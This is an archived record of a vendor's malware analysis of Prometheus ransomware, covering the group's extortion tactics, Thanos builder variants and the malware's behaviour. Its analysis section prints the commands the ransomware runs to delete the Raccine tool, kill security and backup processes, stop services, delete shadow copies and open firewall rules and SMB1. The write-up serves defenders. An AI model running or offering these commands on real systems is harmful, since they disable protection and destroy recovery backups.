{
	"id": "35fc2ee7-03ae-48bb-bee3-d749bc0a091f",
	"created_at": "2026-04-06T00:21:43.812481Z",
	"updated_at": "2026-04-10T03:21:15.900946Z",
	"deleted_at": null,
	"sha1_hash": "275caccc3ca71b92a6a02b2374babb0cc782a0a7",
	"title": "Cybereason vs. Prometheus Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 810244,
	"plain_text": "Cybereason vs. Prometheus Ransomware\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-05 17:32:46 UTC\r\nPrometheus is a relatively new variant of the Thanos ransomware that is operated independently by the Prometheus\r\ngroup, and was first observed in February of 2021. In just a short period of time, Prometheus caused a lot of\r\ndamage, and breached over 40 companies.\r\nKey Findings\r\nHigh Severity: The Cybereason Nocturnus Team assesses the threat level as HIGH given the destructive\r\npotential of the attacks.\r\nHuman Operated Attack: Prior to the deployment of the ransomware, the attackers attempt to infiltrate\r\nand move laterally throughout the organization, carrying out a fully-developed attack operation.\r\nShared Builder: The Prometheus group, as well as other threat actors, used the Thanos builder to build and\r\ncustomize their ransomware.\r\nGroup of REvil?: Prometheus ransomware branding themselves as part of the REvil group, probably in an\r\nattempt to piggyback on the fame of one of the most infamous - and successful - ransomware groups.\r\nDetected and Prevented: The Cybereason Defense Platform fully detects and prevents the Prometheus\r\nransomware:\r\nCybereason Detects and Blocks Prometheus Ransomware\r\nhttps://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware\r\nPage 1 of 11\n\nLike other prominent ransomware groups, such as the DarkSide group, Prometheus follows the RaaS business\r\nmodel and operates as a professional enterprise where it refers to its victims as “customers,” and communicates\r\nwith them using a customer service ticketing system.\r\nIn addition, Prometheus follows the double extortion trend and hosts a leak site, where it has a “hall of shame” for\r\nvictims and posts stolen data for sale. The names of the victims are posted on the website even before the victims\r\ndecide whether to pay or not, either under the status “waiting for the company decision” or “company paid, data is\r\nnot for sale.”\r\nWhen it comes to the affected industries and regions, the group seems to attack almost indiscriminately. According\r\nto their website, the group claims to have breached over 40 organizations from different industries/sectors. Among\r\ntheir victims observed were companies in the following industries: consulting, oil and gas, financial, media,\r\ngovernments, advertising, manufacturing, retail, food, hotels, manufacturing, insurance, transportation, and\r\nmedical services. The regions affected are South America, US, UK, Middle-East, UAE, Asia and Europe.\r\nIt’s also interesting to note that some victims appear to be on the list more than once, but attacked in different time\r\nperiods. Since those victims had paid, it’s unclear at this point if it’s by mistake or that the group has attacked the\r\nsame victim more than once before or even after paying. \r\nA recent Cybereason report titled Ransomware: The True Cost to Business, found that 80% of organizations that\r\npaid a ransom were hit by a second attack, and almost half of those were hit by the same threat group.\r\nGroup of REvil?\r\nUp until June 14th, the operators of Prometheus claimed to be part of the notorious REvil ransomware group, and\r\neven mentioned them in their logo. On June 15th, the group decided to delete the name of REvil from their logo,\r\nand remove any potential relation to the group. \r\nIt is worth noting that there hasn’t been strong or conclusive evidence of a real connection or collaboration\r\nbetween the two groups and the assumption is that the Prometheus group was most likely just using the name and\r\nreputation of REvil to increase the likelihood of ransom payments. \r\nAlthough it is unclear why the group has decided to remove the name of REvil from their logo, it’s interesting to\r\nlook at the timing. The REvil group was just attributed to another major attack infecting potentially thousands of\r\ncompanies by way of an exploit against Kaseya VSA remote management service which propagated ransomware\r\nthrough the IT service provider’s Managed Services Provider network, and a recent attack against the global food\r\ncompany JBS which drew attention to them from the US authorities. \r\nIn May, it was the DarkSide group that made big headlines after attacking the Colonial Pipeline network, which\r\ncaused the US authorities to take actions that eventually led to the DarkSide group shutting down their operations\r\n(allegedly). Ransomware operators will usually try to evade such  unwanted publicity because of their fear of\r\nretaliation from law enforcement agencies.\r\nhttps://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware\r\nPage 2 of 11\n\nScreenshots from the Prometheus leaks website\r\nFrom one Builder to Multiple Ransomware\r\nAs mentioned in the beginning of this blog post, Prometheus is not an entirely new ransomware. It is a variant of\r\nthe Thanos ransomware, which has been sold in underground forums since late 2019. The group behind\r\nPrometheus, as well as other threat actors, bought Thanos and used the builder that comes with it to customize\r\ntheir ransomware:\r\nThe builder used to configure Thanos. Credit: Recorded Future\r\nMost of the distinguishing changes observed include the extension that is added to the encrypted files and of\r\ncourse the ransom note content. Because of that, there are different variants of the Thanos ransomware out there,\r\nwith most of them named after the extension that is appended to the encrypted files.\r\nThe following table presents some of the variants found in the wild:\r\nRansomware\r\nName\r\nRansom note Extension\r\nThanos RESTORE_FILES_INFO.txt\r\n.crypted\r\nrandom string\r\nHakbit HOW_TO_RECOVER_YOUR_FILES.txt\r\n.[ID-30BC8771].\r\n[black_private@tuta.io].CRYSTAL\r\n.VIPxxx\r\nAbarcy Abarcy#2996.txt .abarcy\r\nHard RESTORE_FILES_INFO.txt .hard\r\nMilleni5000  RESTORE_FILES_INFO.txt .secure\r\nRavack HELP_ME_RECOVER_MY_FILES.txt .ravack\r\nhttps://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware\r\nPage 3 of 11\n\nEnergy  HOW_TO_DECYPHER_FILES.txt .energy[potentialenergy@mail.ru]\r\nAlumni HOW_TO_RECOVER_YOUR_FILES.txt .alumni\r\nPrometheus  RESTORE_FILES_INFO.txt\r\n.[XXX-XXX-XXXX] format (unique per victim)\r\n.PROM[prometheushelp@mail[.]ch]\r\nXXXXXXXXXX[prometheusdec@yahoo[.]com]\r\n(unique per victim)\r\nPrometheus Ransomware Analysis\r\nThe binary generated by the builder is an obfuscated .NET executable that consists of a main function that is\r\nresponsible to decode base64 strings in memory and pass them to the other functions.\r\nAmong the functionality observed by the malware is the ability to enumerate processes and manipulate with them,\r\nchanging registry keys, setting persistence, downloading additional files, collecting information about the machine\r\nand more:\r\nThe execution of the ransomware as shown in the Cybereason Defense Platform\r\nSetting Persistence\r\nPrometheus creates persistence by copying the file into the startup folder of the user. This ensures that the malware\r\nwill continue to run after logoff-login of the user:\r\nAdding the ransomware binary to the startup folder\r\nEnsuring Successful File Encryption\r\nUpon execution, Prometheus performs a series of tasks to ensure that it will run smoothly without interference.\r\nThese tasks include stopping common security tools and backup related processes, interacting with the registry and\r\nscheduled task, deleting files, and interacting with services.\r\nDeleting Raccine:\r\nRaccine is a ransomware prevention tool that tries to stop ransomware from deleting shadow copies in Windows.\r\nPrometheus deletes the scheduled task and the registry keys of the software:\r\nhttps://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware\r\nPage 4 of 11\n\nreg delete \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Raccine Tray\" /F\r\nreg delete HKCU\\Software\\Raccine /F\r\nschtasks /DELETE /TN \"Raccine Rules Updater\" /F\r\nDeleting Raccine: deleting the registry key and scheduled task and killing the process\r\nStopping Processes:\r\nPrometheus stops different processes that may interfere with its execution, and also to free DB related files for\r\nencryption:\r\ntaskkill.exe /IM sqlagent.exe /F\r\ntaskkill.exe /IM steam.exe /F\r\ntaskkill.exe /IM Ntrtscan.exe /F\r\ntaskkill.exe /IM msftesql.exe /F\r\ntaskkill.exe /IM tmlisten.exe /F\r\ntaskkill.exe /IM dbeng50.exe /F\r\ntaskkill.exe /IM mbamtray.exe /F\r\ntaskkill.exe /IM firefoxconfig.exe\r\n/F\r\ntaskkill.exe /IM\r\nmydesktopservice.exe /F\r\ntaskkill.exe /IM synctime.exe /F\r\ntaskkill.exe /IM agntsvc.exe /F\r\ntaskkill.exe /IM mysqld-opt.exe /F\r\ntaskkill.exe /IM mspub.exe /F\r\ntaskkill.exe /IM PccNTMon.exe\r\n/F\r\ntaskkill.exe /IM\r\nsqbcoreservice.exe /F\r\ntaskkill.exe /IM visio.exe /F\r\ntaskkill.exe /IM encsvc.exe /F\r\ntaskkill.exe /IM thebat64.exe /F\r\ntaskkill.exe /IM outlook.exe /F\r\ntaskkill.exe /IM\r\nmydesktopqos.exe /F\r\ntaskkill.exe /IM msaccess.exe /F\r\ntaskkill.exe /IM excel.exe /F\r\ntaskkill.exe /IM isqlplussvc.exe\r\n/F\r\ntaskkill.exe /IM tbirdconfig.exe\r\n/F\r\ntaskkill.exe /IM ocomm.exe /F\r\ntaskkill.exe /IM CNTAoSMgr.exe\r\n/F\r\ntaskkill.exe /IM onenote.exe /F\r\ntaskkill.exe /IM thebat.exe /F\r\ntaskkill.exe /F /IM\r\nRaccineSettings.exe\r\ntaskkill.exe /IM sqlwriter.exe /F\r\ntaskkill.exe /IM wordpad.exe /F\r\ntaskkill.exe /IM dbsnmp.exe /F\r\ntaskkill.exe /IM xfssvccon.exe /F\r\ntaskkill.exe /IM powerpnt.exe /F\r\ntaskkill.exe /IM mysqld.exe /F\r\nProcess enumeration\r\nhttps://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware\r\nPage 5 of 11\n\nStopping Services:\r\nPrometheus stops different services that may interfere with it’s execution, and also to free DB related files for\r\nencryption:\r\nnet.exe start Dnscache /y\r\nnet.exe start FDResPub /y\r\nnet.exe start SSDPSRV /y\r\nnet.exe start upnphost /y\r\nnet.exe stop BMR Boot Service\r\n/y\r\nnet.exe stop\r\nBackupExecAgentAccelerator /y\r\nnet.exe stop\r\nBackupExecAgentBrowser /y\r\nnet.exe stop\r\nBackupExecDiveciMediaService\r\n/y\r\nnet.exe stop\r\nBackupExecJobEngine /y\r\nnet.exe stop\r\nBackupExecVSSProvider /y\r\nnet.exe stop CAARCUpdateSvc\r\n/y\r\nnet.exe stop DefWatch /y\r\nnet.exe stop EPSecurityService\r\n/y\r\nnet.exe stop EPUpdateService /y\r\nnet.exe stop ESHASRV /y\r\nnet.exe stop EhttpSrv /y\r\nnet.exe stop EsgShKernel /y\r\nnet.exe stop\r\nMSSQLFDLauncher$PROFXENGAGEMENT\r\n/y\r\nnet.exe stop\r\nMSSQLFDLauncher$SBSMONITORING /y\r\nnet.exe stop\r\nMSSQLFDLauncher$SHAREPOINT /y\r\nnet.exe stop MSSQLFDLauncher$SQL_2008\r\n/y\r\nnet.exe stop\r\nMSSQLFDLauncher$SYSTEM_BGC /y\r\nnet.exe stop MSSQLSERVER /y\r\nnet.exe stop MSSQLServerOLAPService /y\r\nnet.exe stop McAfeeDLPAgentService /y\r\nnet.exe stop\r\nMcAfeeFrameworkMcAfeeFramework /y\r\nnet.exe stop McShield /y\r\nnet.exe stop MsDtsServer100 /y\r\nnet.exe stop MySQL80 /y\r\nnet.exe stop NetBackup BMR MTFTP Service\r\n/y\r\nnet.exe stop PDVFSService /y\r\nnet.exe stop PDVFSService /y\r\nnet.exe stop POP3Svc /y\r\nnet.exe stop QBCFMonitorService /y\r\nnet.exe stop QBFCService /y\r\nnet.exe stop\r\nVeeamTransportSvc /y\r\nnet.exe stop\r\nVeeamTransportSvc /y\r\nnet.exe stop W3Svc /y\r\nnet.exe stop YooBackup\r\n/y\r\nnet.exe stop YooIT /y\r\nnet.exe stop avpsus /y\r\nnet.exe stop bedbg /y\r\nnet.exe stop ccEvtMgr /y\r\nnet.exe stop ccSetMgr /y\r\nnet.exe stop ekrn /y\r\nnet.exe stop kavfsslp /y\r\nnet.exe stop klnagent /y\r\nnet.exe stop macmnsvc /y\r\nnet.exe stop mfemms /y\r\nnet.exe stop mfewc /y\r\nnet.exe stop\r\nmozyprobackup /y\r\nnet.exe stop ntrtscan /y\r\nnet.exe stop sophos /y\r\nnet.exe stop\r\nstc_raw_agent /y\r\nnet.exe stop veeam /y\r\nhttps://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware\r\nPage 6 of 11\n\nnet.exe stop FA_Scheduler /y\r\nnet.exe stop\r\nIntuit.QuickBooks.FCS /y\r\nnet.exe stop KAVFS /y\r\nnet.exe stop KAVFSGT /y\r\nnet.exe stop MBEndpointAgent\r\n/y\r\nnet.exe stop MMS /y\r\nnet.exe stop MSExchangeIS /y\r\nnet.exe stop\r\nMSExchangeMGMT /y\r\nnet.exe stop\r\nMSSQL$SQLEXPRESS /y\r\nnet.exe stop MSSQL$SQL_2008\r\n/y\r\nnet.exe stop\r\nMSSQL$SYSTEM_BGC /y\r\nnet.exe stop MSSQL$TPS /y\r\nnet.exe stop MSSQL$TPSAMA\r\n/y\r\nnet.exe stop\r\nMSSQL$VEEAMSQL2008R2\r\n/y\r\nnet.exe stop\r\nMSSQL$VEEAMSQL2008R2\r\n/y\r\nnet.exe stop\r\nMSSQL$VEEAMSQL2012 /y\r\nnet.exe stop QBIDPService /y\r\nnet.exe stop RTVscan /y\r\nnet.exe stop ReportServer /y\r\nnet.exe stop ReportServer$SQL_2008 /y\r\nnet.exe stop SDRSVC /y\r\nnet.exe stop SMTPSvc /y\r\nnet.exe stop SQLAgent$VEEAMSQL2008R2\r\n/y\r\nnet.exe stop SQLWriter /y\r\nnet.exe stop SamSs /y\r\nnet.exe stop SavRoam /y\r\nnet.exe stop\r\nzhudongfangyu /y\r\nnet.exe stop “Acronis\r\nVSS Provider” /y\r\nnet.exe stop “Enterprise\r\nClient Service” /y\r\nnet.exe stop “SQL\r\nBackups /y\r\nnet.exe stop “Sophos\r\nAutoUpdate Service” /y\r\nnet.exe stop “Sophos\r\nClean Service” /y\r\nnet.exe stop “Sophos\r\nDevice Control Service”\r\n/y\r\nnet.exe stop “Symantec\r\nSystem Recovery” /y\r\nnet.exe stop\r\nVeeamBackupSvc /y\r\nnet.exe stop\r\nVeeamBrokerSvc /y\r\nnet.exe stop\r\nVeeamCloudSvc /y\r\nnet.exe stop\r\nVeeamDeploySvc /y\r\nnet.exe stop\r\nVeeamDeploymentService\r\n/y\r\nnet.exe stop\r\nVeeamMountSvc /y\r\nnet.exe stop\r\nVeeamNFSSvc /y\r\nnet.exe stop SstpSvc /y\r\nhttps://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware\r\nPage 7 of 11\n\nnet.exe stop VSNAPVSS\r\n/y\r\nDeleting Shadow Copies\r\nLike other ransomware, Prometheus deletes the shadow copies to prevent restoring backups of the machine after\r\nencrypting files. To do so, it runs the following PowerShell command:\r\n\"powershell.exe\" \u0026 Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }\r\nConfiguring Services\r\nsc.exe config SSDPSRV start= auto Enables discovery of UPnP devices on your home network\r\nsc.exe config Dnscache start= auto\r\nCaches DNS names and registers the full computer name for\r\nyour computer\r\nsc.exe config upnphost start= auto Allows UPnP devices to be hosted on your computer\r\nsc.exe config FDResPub start= auto\r\nPublishes your computer and resources attached to your\r\ncomputer so they can be discovered over the network\r\nsc.exe config SQLTELEMETRY$ECWDB2\r\nstart= disabled\r\nSQL service, disabled to prevent backup and unlocking files\r\nsc.exe config SQLTELEMETRY start=\r\ndisabled\r\nSQL service, disabled to prevent backup and unlocking files\r\nsc.exe config SQLWriter start= disabled SQL service, disabled to prevent backup and unlocking files\r\nsc.exe config SstpSvc start= disabled\r\nPrevent users from being able to use SSTP (Secure Socket\r\nTunneling Protocol) to access remote servers\r\nSpreading Across The Network\r\nhttps://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware\r\nPage 8 of 11\n\nOnce successfully executed, Prometheus will try to spread in the network using different methods. First, it will\r\n“prepare the ground” by performing some reconnaissance commands that include running “Net view” and “arp -\r\na”, followed by a ping sweep to check the connections and potential machines to infect.\r\nThen it continues with changing local firewall rules, downloading Psexec/Paexec and in some cases ProcessHider\r\nas well, and enabling SMB1 protocol - most likely to exploit a vulnerability for spreading using SMB, much like\r\nas EternalBlue:\r\nnetsh advfirewall firewall set rule group=\\\"Network Discovery\\\" new enable=Yes\r\nnetsh advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes\r\npowershell.exe \u0026 Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol\r\nAfter that, the malware begins the spreading process. Initially it will try an easy way using the “Net use” command\r\nto try to copy itself into shared folders. Then it will run PsExec/PaExec remotely to execute the binary. On other\r\noccasions it will try to exploit a SMB vulnerability to spread:\r\nA VirusTotal graph showing the connection between Prometheus binaries and Psexec, Paexec and ProcessHider\r\nEncrypting The Files\r\nAfter ensuring successful execution of the malware and deleting backup files, Prometheus begins it’s encryption\r\nroutine. First, it will search for files matching extensions that were passed in build time. Those extensions vary\r\nfrom Microsoft Office files, images, scripts, archives, music, videos, and different database files:\r\nSearching for DB files\r\nThe builder also supports a “fast mode” of encryption where only a portion of each file is encrypted. When this\r\nmode is enabled during build time, the ransomware encrypts a preconfigured amount of data from each file and\r\noverwrites the file with the encrypted content. This technique saves Prometheus time and shortens the entire\r\nencryption time, which can take just seconds up to a few minutes, depending on the number of files on the targeted\r\nmachine.\r\nPrometheus appends a custom extension that is unique for every executable and in some variants even contains the\r\nname of the victim:\r\nCustom extension appended to the encrypted files\r\nFinally, Prometheus drops a ransom note in .hta and text format, and presents the .hta file to the end user:\r\nhttps://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware\r\nPage 9 of 11\n\n.hta file ransom note\r\n.txt file ransom note\r\nCybereason Detection and Prevention\r\nRansomware attacks are on the rise. A recently released report by Cybereason, titled Ransomware: The True Cost\r\nto Business, detailed how malicious actors are fine-tuning their ransomware campaign tactics and how both the\r\nfrequency and severity of successful ransomware attacks have tremendous impact on victim organizations and\r\ntheir ability to conduct business.\r\nThe Cybereason Defense Platform is able to prevent the execution of the Prometheus Ransomware using multi-layer protection that detects and blocks ransomware with threat intelligence, machine learning, and next-gen\r\nantivirus (NGAV) capabilities. Additionally, when the Anti-Ransomware feature is enabled, behavioral detection\r\ntechniques in the platform are able to detect and prevent any attempt to encrypt files and automatically generates a\r\nMalopTM for it with the complete attack narrative:\r\nMalop for Prometheus ransomware as shown in the Cybereason Defense Platform\r\nUsing the Anti-Malware feature with the right configurations (listed in the recommendations below), the\r\nCybereason Defense Platform will also detect and prevent the execution of the ransomware and ensure that it\r\ncannot encrypt targeted files. The prevention is based on machine learning, which blocks both known and\r\nunknown malware variants:\r\nPrevention alert of the Prometheus ransomware as shown in the Cybereason Defense Platform\r\nCybereason user notification for preventing the execution of Prometheus\r\nSecurity Recommendations\r\nEnable the Anti-Ransomware Feature on Cybereason NGAV: Set Cybereason Anti-Ransomware\r\nprotection mode to Prevent - more information for customers can be found here\r\nEnable Anti-Malware Feature on Cybereason NGAV: Set Cybereason Anti-Malware mode to Prevent\r\nand set the detection mode to Moderate and above - more information for customers can be found here\r\nKeep Systems Fully Patched: Make sure your systems are patched in order to mitigate vulnerabilities\r\nRegularly Backup Files to a Remote Server: Restoring your files from a backup is the fastest way to\r\nregain access to your data\r\nUse Security Solutions: Protect your environment using organizational firewalls, proxies, web filtering,\r\nand mail filtering\r\nhttps://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware\r\nPage 10 of 11\n\nCybereason is dedicated to teaming with defenders to end cyber attacks from endpoints to the enterprise to\r\neverywhere - including modern ransomware. Learn more about ransomware defense here or schedule a demo\r\ntoday to learn how your organization can benefit from an operation-centric approach to security.\r\nLIOR ROCHBERGER, SENIOR THREAT RESEARCHER AND THREAT HUNTER,\r\nCYBEREASON\r\nAs part of the Nocturnus team at Cybereason, Lior has created procedures to lead threat hunting, reverse\r\nengineering and malware analysis teams. Lior has also been a contributing researcher to multiple threat and\r\nmalware blogs including Bitbucket, Valak, Ramnit, and Racoon stealer. Prior to Cybereason, Lior led SOC\r\noperations within the Israeli Air Force.\r\nAbout the Author\r\nCybereason Nocturnus\r\n \r\nThe Cybereason Nocturnus Team has brought the world’s brightest minds from the military, government\r\nintelligence, and enterprise security to uncover emerging threats across the globe. They specialize in analyzing new\r\nattack methodologies, reverse-engineering malware, and exposing unknown system vulnerabilities. The\r\nCybereason Nocturnus Team was the first to release a vaccination for the 2017 NotPetya and Bad Rabbit\r\ncyberattacks.\r\nAll Posts by Cybereason Nocturnus\r\nSource: https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware\r\nhttps://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware"
	],
	"report_names": [
		"cybereason-vs.-prometheus-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434903,
	"ts_updated_at": 1775791275,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/275caccc3ca71b92a6a02b2374babb0cc782a0a7.pdf",
		"text": "https://archive.orkl.eu/275caccc3ca71b92a6a02b2374babb0cc782a0a7.txt",
		"img": "https://archive.orkl.eu/275caccc3ca71b92a6a02b2374babb0cc782a0a7.jpg"
	}
}